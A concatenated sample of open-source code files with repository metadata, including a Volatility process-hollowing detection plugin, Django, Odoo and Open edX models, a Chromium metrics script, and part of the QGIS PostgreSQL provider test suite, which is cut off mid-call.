shantanu561993/volatility | volatility/plugins/linux/process_hollow.py | 14 | 4604 | # Volatility
# Copyright (C) 2007-2013 Volatility Foundation
#
# This file is part of Volatility.
#
# Volatility is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License Version 2 as
# published by the Free Software Foundation. You may not use, modify or
# distribute this program under any other version of the GNU General
# Public License.
#
# Volatility is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Volatility. If not, see <http://www.gnu.org/licenses/>.
#
"""
@author: Andrew Case
@license: GNU General Public License 2.0
@contact: atcuno@gmail.com
@organization:
"""
import volatility.obj as obj
import volatility.debug as debug
import volatility.addrspace as addrspace
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
class linux_process_hollow(linux_pslist.linux_pslist):
"""Checks for signs of process hollowing"""
def __init__(self, config, *args, **kwargs):
linux_pslist.linux_pslist.__init__(self, config, *args, **kwargs)
self._config.add_option('BASE', short_option = 'b', default = None, help = 'The address of the ELF file in memory', action = 'store', type='long' )
self._config.add_option('PATH', short_option = 'P', default = None, help = 'The path of the known good file', action = 'store', type='str')
# TODO:
# make aware of if application or library
# check the class, then do offset + base based on that
def calculate(self):
linux_common.set_plugin_members(self)
if not self._config.BASE:
debug.error("No base address specified.")
if not self._config.PATH:
debug.error("No known-good path specified.")
fd = open(self._config.PATH, "rb")
known_good = fd.read()
fd.close()
bufferas = addrspace.BufferAddressSpace(self._config, data = known_good)
elf_hdr = obj.Object("elf_hdr", offset = 0, vm = bufferas)
tasks = linux_pslist.linux_pslist.calculate(self)
for task in tasks:
proc_as = task.get_process_address_space()
for vma in task.get_proc_maps():
if self._config.BASE != vma.vm_start:
continue
for sym in elf_hdr.symbols():
if sym.st_value == 0 or (sym.st_info & 0xf) != 2:
continue
symname = elf_hdr.symbol_name(sym)
sym_offset = sym.st_value
# in the same vma
if vma.vm_start < sym.st_value < vma.vm_end:
vm_start = vma.vm_start
sym_offset = sym_offset - vm_start
full_address = sym.st_value
else:
next_vma = vma.vm_next
if next_vma.vm_start < sym.st_value < next_vma.vm_end:
vm_start = next_vma.vm_start
sym_offset = sym.st_value - vm_start
full_address = sym.st_value
else:
full_address = vma.vm_start + sym.st_value
mem_buffer = proc_as.read(vm_start + sym_offset, sym.st_size)
if sym.st_value > vma.vm_start:
disk_off = sym.st_value - vm_start
else:
disk_off = sym.st_value
disk_buffer = bufferas.read(disk_off, sym.st_size)
# bad
if mem_buffer != None and disk_buffer != mem_buffer:
yield task, symname, full_address
elif mem_buffer == None:
print "Function %s paged out in memory" % symname
def render_text(self, outfd, data):
self.table_header(outfd, [("Task", "16"),
("PID", "6"),
("Symbol Name", "32"),
("Symbol Address", "[addrpad]"),
])
for (task, symname, address) in data:
self.table_row(outfd, str(task.comm), task.pid, symname, address)
| gpl-2.0 |
cscorley/doc2vec-feature-location | scripts/boxplots.py | 2 | 1180 |
# coding: utf-8
# In[1]:
import numpy as np
import matplotlib.pyplot as plt
import gensim
import src.main
# In[2]:
def get_all_ranks(project):
r_lda = [x for x,y,z in src.main.read_ranks(project, 'release_lda')]
r_lsi = [x for x,y,z in src.main.read_ranks(project, 'release_lsi')]
c_lda = [x for x,y,z in src.main.read_ranks(project, 'changeset_lda')]
c_lsi = [x for x,y,z in src.main.read_ranks(project, 'changeset_lsi')]
try:
t_lda = [x for x,y,z in src.main.read_ranks(project, 'temporal_lda')]
t_lsi = [x for x,y,z in src.main.read_ranks(project, 'temporal_lsi')]
except:
t_lda = []
t_lsi = []
return r_lda, c_lda, t_lda, r_lsi, c_lsi, t_lsi
# In[3]:
projects = src.main.load_projects()
# In[8]:
for project in projects:
ranks = get_all_ranks(project)
fig = plt.figure(dpi=300)
fig.gca().boxplot(ranks,
labels=['S-LDA', 'C-LDA', 'T-LDA', 'S-LSI', 'C-LSI', 'T-LSI'])
fig.gca().set_title(' '.join([project.name, project.version, project.level]))
plt.savefig('paper/figures/' + project.name + project.version + project.level + '.png')
plt.close()
# In[ ]:
| bsd-3-clause |
a-nai/django-wiki | wiki/plugins/haystack/search_indexes.py | 16 | 1113 | from __future__ import absolute_import
from __future__ import unicode_literals
from haystack import indexes
from wiki import models
class ArticleIndex(indexes.SearchIndex, indexes.Indexable):
text = indexes.CharField(document=True, use_template=True)
created = indexes.DateTimeField(model_attr='created')
modified = indexes.DateTimeField(model_attr='modified')
# default because indexing fails with whoosh. see.
# http://stackoverflow.com/questions/11995367/how-do-i-use-a-boolean-field-in-django-haystack-search-query
# https://github.com/toastdriven/django-haystack/issues/382
other_read = indexes.BooleanField(model_attr='other_read', default=False)
group_read = indexes.BooleanField(model_attr='group_read', default=False)
owner_id = indexes.IntegerField(model_attr='owner__id', null=True)
group_id = indexes.IntegerField(model_attr='group__id', null=True)
def get_model(self):
return models.Article
def index_queryset(self, using=None):
"""Used when the entire index for model is updated."""
return self.get_model().objects.all()
| gpl-3.0 |
kostajaitachi/shogun | examples/undocumented/python_modular/preprocessor_sortulongstring_modular.py | 26 | 1464 | #!/usr/bin/env python
from tools.load import LoadMatrix
lm=LoadMatrix()
traindna = lm.load_dna('../data/fm_train_dna.dat')
testdna = lm.load_dna('../data/fm_test_dna.dat')
parameter_list = [[traindna,testdna,4,0,False,False],[traindna,testdna,3,0,False,False]]
def preprocessor_sortulongstring_modular (fm_train_dna=traindna,fm_test_dna=testdna,order=3,gap=0,reverse=False,use_sign=False):
from modshogun import CommUlongStringKernel
from modshogun import StringCharFeatures, StringUlongFeatures, DNA
from modshogun import SortUlongString
charfeat=StringCharFeatures(DNA)
charfeat.set_features(fm_train_dna)
feats_train=StringUlongFeatures(charfeat.get_alphabet())
feats_train.obtain_from_char(charfeat, order-1, order, gap, reverse)
charfeat=StringCharFeatures(DNA)
charfeat.set_features(fm_test_dna)
feats_test=StringUlongFeatures(charfeat.get_alphabet())
feats_test.obtain_from_char(charfeat, order-1, order, gap, reverse)
preproc=SortUlongString()
preproc.init(feats_train)
feats_train.add_preprocessor(preproc)
feats_train.apply_preprocessor()
feats_test.add_preprocessor(preproc)
feats_test.apply_preprocessor()
kernel=CommUlongStringKernel(feats_train, feats_train, use_sign)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('CommUlongString')
preprocessor_sortulongstring_modular(*parameter_list[0])
| gpl-3.0 |
appsembler/edx-platform | lms/djangoapps/grades/config/models.py | 12 | 3085 | """
Models for configuration of the feature flags
controlling persistent grades.
"""
from config_models.models import ConfigurationModel
from django.conf import settings
from django.db.models import BooleanField, IntegerField, TextField
from opaque_keys.edx.django.models import CourseKeyField
from six import text_type
from openedx.core.djangoapps.request_cache.middleware import request_cached
class PersistentGradesEnabledFlag(ConfigurationModel):
"""
Enables persistent grades across the platform.
When this feature flag is set to true, individual courses
must also have persistent grades enabled for the
feature to take effect.
"""
# this field overrides course-specific settings to enable the feature for all courses
enabled_for_all_courses = BooleanField(default=False)
@classmethod
@request_cached
def feature_enabled(cls, course_id=None):
"""
Looks at the currently active configuration model to determine whether
the persistent grades feature is available.
If the flag is not enabled, the feature is not available.
If the flag is enabled and the provided course_id is for an course
with persistent grades enabled, the feature is available.
If the flag is enabled and no course ID is given,
we return True since the global setting is enabled.
"""
if settings.FEATURES.get('PERSISTENT_GRADES_ENABLED_FOR_ALL_TESTS'):
return True
if not PersistentGradesEnabledFlag.is_enabled():
return False
elif not PersistentGradesEnabledFlag.current().enabled_for_all_courses and course_id:
effective = CoursePersistentGradesFlag.objects.filter(course_id=course_id).order_by('-change_date').first()
return effective.enabled if effective is not None else False
return True
class Meta(object):
app_label = "grades"
def __unicode__(self):
current_model = PersistentGradesEnabledFlag.current()
return u"PersistentGradesEnabledFlag: enabled {}".format(
current_model.is_enabled()
)
class CoursePersistentGradesFlag(ConfigurationModel):
"""
Enables persistent grades for a specific
course. Only has an effect if the general
flag above is set to True.
"""
KEY_FIELDS = ('course_id',)
class Meta(object):
app_label = "grades"
# The course that these features are attached to.
course_id = CourseKeyField(max_length=255, db_index=True)
def __unicode__(self):
not_en = "Not "
if self.enabled:
not_en = ""
# pylint: disable=no-member
return u"Course '{}': Persistent Grades {}Enabled".format(text_type(self.course_id), not_en)
class ComputeGradesSetting(ConfigurationModel):
"""
...
"""
class Meta(object):
app_label = "grades"
batch_size = IntegerField(default=100)
course_ids = TextField(
blank=False,
help_text="Whitespace-separated list of course keys for which to compute grades."
)
| agpl-3.0 |
Aravinthu/odoo | odoo/addons/base/ir/ir_filters.py | 16 | 7285 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import ast
from odoo import api, fields, models, tools, _
from odoo.exceptions import UserError
class IrFilters(models.Model):
_name = 'ir.filters'
_description = 'Filters'
_order = 'model_id, name, id desc'
name = fields.Char(string='Filter Name', translate=True, required=True)
user_id = fields.Many2one('res.users', string='User', ondelete='cascade', default=lambda self: self._uid,
help="The user this filter is private to. When left empty the filter is public "
"and available to all users.")
domain = fields.Text(default='[]', required=True)
context = fields.Text(default='{}', required=True)
sort = fields.Text(default='[]', required=True)
model_id = fields.Selection(selection='_list_all_models', string='Model', required=True)
is_default = fields.Boolean(string='Default Filter')
action_id = fields.Many2one('ir.actions.actions', string='Action', ondelete='cascade',
help="The menu action this filter applies to. "
"When left empty the filter applies to all menus "
"for this model.")
active = fields.Boolean(default=True)
@api.model
def _list_all_models(self):
self._cr.execute("SELECT model, name FROM ir_model ORDER BY name")
return self._cr.fetchall()
@api.multi
def copy(self, default=None):
self.ensure_one()
default = dict(default or {}, name=_('%s (copy)') % self.name)
return super(IrFilters, self).copy(default)
@api.multi
def _get_eval_domain(self):
self.ensure_one()
return ast.literal_eval(self.domain)
@api.model
def _get_action_domain(self, action_id=None):
"""Return a domain component for matching filters that are visible in the
same context (menu/view) as the given action."""
if action_id:
# filters specific to this menu + global ones
return [('action_id', 'in', [action_id, False])]
# only global ones
return [('action_id', '=', False)]
@api.model
def get_filters(self, model, action_id=None):
"""Obtain the list of filters available for the user on the given model.
:param action_id: optional ID of action to restrict filters to this action
plus global filters. If missing only global filters are returned.
The action does not have to correspond to the model, it may only be
a contextual action.
:return: list of :meth:`~osv.read`-like dicts containing the
``name``, ``is_default``, ``domain``, ``user_id`` (m2o tuple),
``action_id`` (m2o tuple) and ``context`` of the matching ``ir.filters``.
"""
# available filters: private filters (user_id=uid) and public filters (uid=NULL),
# and filters for the action (action_id=action_id) or global (action_id=NULL)
action_domain = self._get_action_domain(action_id)
filters = self.search(action_domain + [('model_id', '=', model), ('user_id', 'in', [self._uid, False])])
user_context = self.env.user.context_get()
return filters.with_context(user_context).read(['name', 'is_default', 'domain', 'context', 'user_id', 'sort'])
@api.model
def _check_global_default(self, vals, matching_filters):
""" _check_global_default(dict, list(dict), dict) -> None
Checks if there is a global default for the model_id requested.
If there is, and the default is different than the record being written
(-> we're not updating the current global default), raise an error
to avoid users unknowingly overwriting existing global defaults (they
have to explicitly remove the current default before setting a new one)
This method should only be called if ``vals`` is trying to set
``is_default``
:raises odoo.exceptions.UserError: if there is an existing default and
we're not updating it
"""
domain = self._get_action_domain(vals.get('action_id'))
defaults = self.search(domain + [
('model_id', '=', vals['model_id']),
('user_id', '=', False),
('is_default', '=', True),
])
if not defaults:
return
if matching_filters and (matching_filters[0]['id'] == defaults.id):
return
raise UserError(_("There is already a shared filter set as default for %(model)s, delete or change it before setting a new default") % {'model': vals.get('model_id')})
@api.model
@api.returns('self', lambda value: value.id)
def create_or_replace(self, vals):
action_id = vals.get('action_id')
current_filters = self.get_filters(vals['model_id'], action_id)
matching_filters = [f for f in current_filters
if f['name'].lower() == vals['name'].lower()
# next line looks for matching user_ids (specific or global), i.e.
# f.user_id is False and vals.user_id is False or missing,
# or f.user_id.id == vals.user_id
if (f['user_id'] and f['user_id'][0]) == vals.get('user_id')]
if vals.get('is_default'):
if vals.get('user_id'):
# Setting new default: any other default that belongs to the user
# should be turned off
domain = self._get_action_domain(action_id)
defaults = self.search(domain + [
('model_id', '=', vals['model_id']),
('user_id', '=', vals['user_id']),
('is_default', '=', True),
])
if defaults:
defaults.write({'is_default': False})
else:
self._check_global_default(vals, matching_filters)
# When a filter exists for the same (name, model, user) triple, we simply
# replace its definition (considering action_id irrelevant here)
if matching_filters:
matching_filter = self.browse(matching_filters[0]['id'])
matching_filter.write(vals)
return matching_filter
return self.create(vals)
_sql_constraints = [
# Partial constraint, complemented by unique index (see below). Still
# useful to keep because it provides a proper error message when a
# violation occurs, as it shares the same prefix as the unique index.
('name_model_uid_unique', 'unique (name, model_id, user_id, action_id)', 'Filter names must be unique'),
]
@api.model_cr_context
def _auto_init(self):
result = super(IrFilters, self)._auto_init()
# Use unique index to implement unique constraint on the lowercase name (not possible using a constraint)
tools.create_unique_index(self._cr, 'ir_filters_name_model_uid_unique_action_index',
self._table, ['lower(name)', 'model_id', 'COALESCE(user_id,-1)', 'COALESCE(action_id,-1)'])
return result
| agpl-3.0 |
byterom/android_external_chromium_org | components/tools/metrics/browser_components_metrics.py | 89 | 2137 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates the metrics collected weekly for the Browser Components project.
See
http://www.chromium.org/developers/design-documents/browser-components
for details.
"""
import os
import sys
# This is done so that we can import checkdeps. If not invoked as
# main, our user must ensure it is in PYTHONPATH.
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..', '..',
'buildtools', 'checkdeps'))
import count_ifdefs
import checkdeps
import results
# Preprocessor pattern to find OS_XYZ defines.
PREPROCESSOR_PATTERN = 'OS_[A-Z]+'
class BrowserComponentsMetricsGenerator(object):
def __init__(self, checkout_root):
self.checkout_root = checkout_root
self.chrome_browser = os.path.join(checkout_root, 'chrome', 'browser')
def CountIfdefs(self, skip_tests):
return count_ifdefs.CountIfdefs(
PREPROCESSOR_PATTERN, self.chrome_browser, skip_tests)
def CountViolations(self, skip_tests):
deps_checker = checkdeps.DepsChecker(self.checkout_root,
ignore_temp_rules=True,
skip_tests=skip_tests)
deps_checker.results_formatter = results.CountViolationsFormatter()
deps_checker.CheckDirectory(os.path.join('chrome', 'browser'))
return int(deps_checker.results_formatter.GetResults())
def main():
generator = BrowserComponentsMetricsGenerator(
os.path.join(os.path.dirname(__file__), '..', '..', '..'))
print "All metrics are for chrome/browser.\n"
print "OS ifdefs, all: %d" % generator.CountIfdefs(False)
print "OS ifdefs, -tests: %d" % generator.CountIfdefs(True)
print ("Intended DEPS violations, all: %d" %
generator.CountViolations(False))
print "Intended DEPS violations, -tests: %d" % generator.CountViolations(True)
return 0
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause |
power12317/weblate | weblate/trans/tests/__init__.py | 1 | 1330 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2013 Michal Čihař <michal@cihar.com>
#
# This file is part of Weblate <http://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from weblate.trans.tests.test_diff import *
from weblate.trans.tests.test_checks import *
from weblate.trans.tests.test_format_checks import *
from weblate.trans.tests.test_source_checks import *
from weblate.trans.tests.test_chars_checks import *
from weblate.trans.tests.test_same_checks import *
from weblate.trans.tests.test_consistency_checks import *
from weblate.trans.tests.test_markup_checks import *
from weblate.trans.tests.test_models import *
from weblate.trans.tests.test_views import *
from weblate.trans.tests.test_commands import *
| gpl-3.0 |
rduivenvoorde/QGIS | tests/src/python/test_provider_postgres.py | 2 | 134441 | # -*- coding: utf-8 -*-
"""QGIS Unit tests for the postgres provider.
Note: to prepare the DB, you need to run the sql files specified in
tests/testdata/provider/testdata_pg.sh
Read tests/README.md about writing/launching tests with PostgreSQL.
Run with ctest -V -R PyQgsPostgresProvider
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from builtins import next
__author__ = 'Matthias Kuhn'
__date__ = '2015-04-23'
__copyright__ = 'Copyright 2015, The QGIS Project'
import qgis # NOQA
import psycopg2
import os
import time
from datetime import datetime
from qgis.core import (
QgsVectorLayer,
QgsVectorLayerExporter,
QgsFeatureRequest,
QgsFeature,
QgsFieldConstraints,
QgsDataProvider,
NULL,
QgsVectorLayerUtils,
QgsSettings,
QgsTransactionGroup,
QgsReadWriteContext,
QgsRectangle,
QgsDefaultValue,
QgsCoordinateReferenceSystem,
QgsProject,
QgsWkbTypes,
QgsGeometry,
QgsProviderRegistry,
QgsVectorDataProvider,
QgsDataSourceUri,
QgsProviderConnectionException,
)
from qgis.gui import QgsGui, QgsAttributeForm
from qgis.PyQt.QtCore import QDate, QTime, QDateTime, QVariant, QDir, QObject, QByteArray, QTemporaryDir
from qgis.PyQt.QtWidgets import QLabel
from qgis.testing import start_app, unittest
from qgis.PyQt.QtXml import QDomDocument
from utilities import unitTestDataPath, compareWkt
from providertestbase import ProviderTestCase
QGISAPP = start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestPyQgsPostgresProvider(unittest.TestCase, ProviderTestCase):
@classmethod
def setUpClass(cls):
"""Run before all tests"""
cls.dbconn = 'service=qgis_test'
if 'QGIS_PGTEST_DB' in os.environ:
cls.dbconn = os.environ['QGIS_PGTEST_DB']
# Create test layers
cls.vl = QgsVectorLayer(
cls.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."someData" (geom) sql=',
'test', 'postgres')
assert cls.vl.isValid()
cls.source = cls.vl.dataProvider()
cls.poly_vl = QgsVectorLayer(
cls.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POLYGON table="qgis_test"."some_poly_data" (geom) sql=',
'test', 'postgres')
assert cls.poly_vl.isValid()
cls.poly_provider = cls.poly_vl.dataProvider()
QgsGui.editorWidgetRegistry().initEditors()
cls.con = psycopg2.connect(cls.dbconn)
@classmethod
def tearDownClass(cls):
"""Run after all tests"""
def execSQLCommand(self, sql):
self.assertTrue(self.con)
cur = self.con.cursor()
self.assertTrue(cur)
cur.execute(sql)
cur.close()
self.con.commit()
def getSource(self):
# create temporary table for edit tests
self.execSQLCommand(
'DROP TABLE IF EXISTS qgis_test."editData" CASCADE')
self.execSQLCommand(
'CREATE TABLE qgis_test."editData" ( pk SERIAL NOT NULL PRIMARY KEY, cnt integer, name text, name2 text, num_char text, dt timestamp without time zone, "date" date, "time" time without time zone, geom public.geometry(Point, 4326))')
self.execSQLCommand("INSERT INTO qgis_test.\"editData\" (pk, cnt, name, name2, num_char, dt, \"date\", \"time\", geom) VALUES "
"(5, -200, NULL, 'NuLl', '5', TIMESTAMP '2020-05-04 12:13:14', '2020-05-02', '12:13:01', '0101000020E61000001D5A643BDFC751C01F85EB51B88E5340'),"
"(3, 300, 'Pear', 'PEaR', '3', NULL, NULL, NULL, NULL),"
"(1, 100, 'Orange', 'oranGe', '1', TIMESTAMP '2020-05-03 12:13:14', '2020-05-03', '12:13:14', '0101000020E61000006891ED7C3F9551C085EB51B81E955040'),"
"(2, 200, 'Apple', 'Apple', '2', TIMESTAMP '2020-05-04 12:14:14', '2020-05-04', '12:14:14', '0101000020E6100000CDCCCCCCCC0C51C03333333333B35140'),"
"(4, 400, 'Honey', 'Honey', '4', TIMESTAMP '2021-05-04 13:13:14', '2021-05-04', '13:13:14', '0101000020E610000014AE47E17A5450C03333333333935340')")
vl = QgsVectorLayer(
self.dbconn +
' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."editData" (geom) sql=',
'test', 'postgres')
return vl
def getEditableLayer(self):
return self.getSource()
def getEditableLayerWithCheckConstraint(self):
"""Returns the layer for attribute change CHECK constraint violation"""
return QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'id\' srid=4326 type=POINT table="public"."test_check_constraint" (geom) sql=', 'test_check_constraint', 'postgres')
def enableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', True)
return True
def disableCompiler(self):
QgsSettings().setValue('/qgis/compileExpressions', False)
def uncompiledFilters(self):
return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
'"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
'"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
def partiallyCompiledFilters(self):
return set([])
def getGeneratedColumnsData(self):
"""
return a tuple with the generated column test layer and the expected generated value
"""
cur = self.con.cursor()
cur.execute("SHOW server_version_num")
pgversion = int(cur.fetchone()[0])
# don't trigger this test when PostgreSQL versions earlier than 12.
if pgversion < 120000:
return (None, None)
else:
return (QgsVectorLayer(self.dbconn + ' sslmode=disable table="qgis_test"."generated_columns"', 'test', 'postgres'),
"""('test:'::text || ((pk)::character varying)::text)""")
# HERE GO THE PROVIDER SPECIFIC TESTS
def testDefaultValue(self):
self.source.setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, True)
self.assertIsInstance(self.source.defaultValue(0), int)
self.assertEqual(self.source.defaultValue(1), NULL)
self.assertEqual(self.source.defaultValue(2), 'qgis')
self.source.setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
def testDefaultValueClause(self):
self.source.setProviderProperty(
QgsDataProvider.EvaluateDefaultValues, False)
self.assertEqual(self.source.defaultValueClause(
0), 'nextval(\'qgis_test."someData_pk_seq"\'::regclass)')
self.assertFalse(self.source.defaultValueClause(1))
self.assertEqual(self.source.defaultValueClause(2), '\'qgis\'::text')
def testDateTimeTypes(self):
vl = QgsVectorLayer('%s table="qgis_test"."date_times" sql=' % (
self.dbconn), "testdatetimes", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName(
'date_field')).type(), QVariant.Date)
self.assertEqual(fields.at(fields.indexFromName(
'time_field')).type(), QVariant.Time)
self.assertEqual(fields.at(fields.indexFromName(
'datetime_field')).type(), QVariant.DateTime)
f = next(vl.getFeatures(QgsFeatureRequest()))
date_idx = vl.fields().lookupField('date_field')
self.assertIsInstance(f.attributes()[date_idx], QDate)
self.assertEqual(f.attributes()[date_idx], QDate(2004, 3, 4))
time_idx = vl.fields().lookupField('time_field')
self.assertIsInstance(f.attributes()[time_idx], QTime)
self.assertEqual(f.attributes()[time_idx], QTime(13, 41, 52))
datetime_idx = vl.fields().lookupField('datetime_field')
self.assertIsInstance(f.attributes()[datetime_idx], QDateTime)
self.assertEqual(f.attributes()[datetime_idx], QDateTime(
QDate(2004, 3, 4), QTime(13, 41, 52)))
def testBooleanType(self):
vl = QgsVectorLayer('{} table="qgis_test"."boolean_table" sql='.format(
self.dbconn), "testbool", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('fld1')).type(), QVariant.Bool)
values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
expected = {
1: True,
2: False,
3: NULL
}
self.assertEqual(values, expected)
def testByteaType(self):
vl = QgsVectorLayer('{} table="qgis_test"."byte_a_table" sql='.format(
self.dbconn), "testbytea", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(fields.at(fields.indexFromName(
'fld1')).type(), QVariant.ByteArray)
values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
expected = {
1: QByteArray(b'YmludmFsdWU='),
2: QByteArray()
}
self.assertEqual(values, expected)
# editing binary values
self.execSQLCommand(
'DROP TABLE IF EXISTS qgis_test."byte_a_table_edit" CASCADE')
self.execSQLCommand(
'CREATE TABLE qgis_test."byte_a_table_edit" ( pk SERIAL NOT NULL PRIMARY KEY, blobby bytea)')
self.execSQLCommand("INSERT INTO qgis_test.\"byte_a_table_edit\" (pk, blobby) VALUES "
"(1, encode('bbb', 'base64')::bytea)")
vl = QgsVectorLayer(
self.dbconn + ' sslmode=disable table="qgis_test"."byte_a_table_edit" sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
expected = {
1: QByteArray(b'YmJi')
}
self.assertEqual(values, expected)
# change attribute value
self.assertTrue(vl.dataProvider().changeAttributeValues(
{1: {1: QByteArray(b'bbbvx')}}))
values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
expected = {
1: QByteArray(b'bbbvx')
}
self.assertEqual(values, expected)
# add feature
f = QgsFeature()
f.setAttributes([2, QByteArray(b'cccc')])
self.assertTrue(vl.dataProvider().addFeature(f))
values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
expected = {
1: QByteArray(b'bbbvx'),
2: QByteArray(b'cccc')
}
self.assertEqual(values, expected)
# change feature
self.assertTrue(vl.dataProvider().changeFeatures(
{2: {1: QByteArray(b'dddd')}}, {}))
values = {feat['pk']: feat['blobby'] for feat in vl.getFeatures()}
expected = {
1: QByteArray(b'bbbvx'),
2: QByteArray(b'dddd')
}
self.assertEqual(values, expected)
def testCitextType(self):
vl = QgsVectorLayer('{} table="qgis_test"."citext_table" sql='.format(
self.dbconn), "testbytea", "postgres")
self.assertTrue(vl.isValid())
fields = vl.dataProvider().fields()
self.assertEqual(
fields.at(fields.indexFromName('fld1')).type(), QVariant.String)
values = {feat['id']: feat['fld1'] for feat in vl.getFeatures()}
expected = {
1: 'test val',
2: NULL
}
self.assertEqual(values, expected)
# editing citext values
self.execSQLCommand(
'DROP TABLE IF EXISTS qgis_test."citext_table_edit" CASCADE')
self.execSQLCommand(
'CREATE TABLE qgis_test."citext_table_edit" ( pk SERIAL NOT NULL PRIMARY KEY, txt citext)')
self.execSQLCommand("INSERT INTO qgis_test.\"citext_table_edit\" (pk, txt) VALUES "
"(1, 'text')")
vl = QgsVectorLayer(
self.dbconn + ' sslmode=disable table="qgis_test"."citext_table_edit" sql=',
'test', 'postgres')
self.assertTrue(vl.isValid())
values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
expected = {
1: 'text'
}
self.assertEqual(values, expected)
# change attribute value
self.assertTrue(
vl.dataProvider().changeAttributeValues({1: {1: 'teeeext'}}))
values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
expected = {
1: 'teeeext'
}
self.assertEqual(values, expected)
# add feature
f = QgsFeature()
f.setAttributes([2, 'teeeeeeeeeext'])
self.assertTrue(vl.dataProvider().addFeature(f))
values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
expected = {
1: 'teeeext',
2: 'teeeeeeeeeext'
}
self.assertEqual(values, expected)
# change feature
self.assertTrue(vl.dataProvider().changeFeatures(
{2: {1: 'teeeeeeeeeeeeeeeeeeeeeeext'}}, {}))
values = {feat['pk']: feat['txt'] for feat in vl.getFeatures()}
expected = {
1: 'teeeext',
2: 'teeeeeeeeeeeeeeeeeeeeeeext'
}
self.assertEqual(values, expected)
def testQueryLayers(self):
def test_query(dbconn, query, key):
ql = QgsVectorLayer(
'%s srid=4326 table="%s" (geom) key=\'%s\' sql=' % (
dbconn, query.replace('"', '\\"'), key), "testgeom",
"postgres")
self.assertTrue(ql.isValid(), '{} ({})'.format(query, key))
test_query(self.dbconn,
'(SELECT NULL::integer "Id1", NULL::integer "Id2", NULL::geometry(Point, 4326) geom LIMIT 0)',
'"Id1","Id2"')
def testWkbTypes(self):
def test_table(dbconn, table_name, wkt):
vl = QgsVectorLayer('%s srid=4326 table="qgis_test".%s (geom) sql=' % (dbconn, table_name), "testgeom",
"postgres")
self.assertTrue(vl.isValid())
for f in vl.getFeatures():
self.assertEqual(f.geometry().asWkt(), wkt)
test_table(self.dbconn, 'p2d', 'Polygon ((0 0, 1 0, 1 1, 0 1, 0 0))')
test_table(self.dbconn, 'p3d',
'PolygonZ ((0 0 0, 1 0 0, 1 1 0, 0 1 0, 0 0 0))')
test_table(self.dbconn, 'triangle2d', 'Polygon ((0 0, 1 0, 1 1, 0 0))')
test_table(self.dbconn, 'triangle3d',
'PolygonZ ((0 0 0, 1 0 0, 1 1 0, 0 0 0))')
test_table(self.dbconn, 'tin2d',
'MultiPolygon (((0 0, 1 0, 1 1, 0 0)),((0 0, 0 1, 1 1, 0 0)))')
test_table(self.dbconn, 'tin3d',
'MultiPolygonZ (((0 0 0, 1 0 0, 1 1 0, 0 0 0)),((0 0 0, 0 1 0, 1 1 0, 0 0 0)))')
test_table(self.dbconn, 'ps2d',
'MultiPolygon (((0 0, 1 0, 1 1, 0 1, 0 0)))')
test_table(self.dbconn, 'ps3d',
'MultiPolygonZ (((0 0 0, 0 1 0, 1 1 0, 1 0 0, 0 0 0)),((0 0 1, 1 0 1, 1 1 1, 0 1 1, 0 0 1)),((0 0 0, 0 0 1, 0 1 1, 0 1 0, 0 0 0)),((0 1 0, 0 1 1, 1 1 1, 1 1 0, 0 1 0)),((1 1 0, 1 1 1, 1 0 1, 1 0 0, 1 1 0)),((1 0 0, 1 0 1, 0 0 1, 0 0 0, 1 0 0)))')
test_table(self.dbconn, 'mp3d',
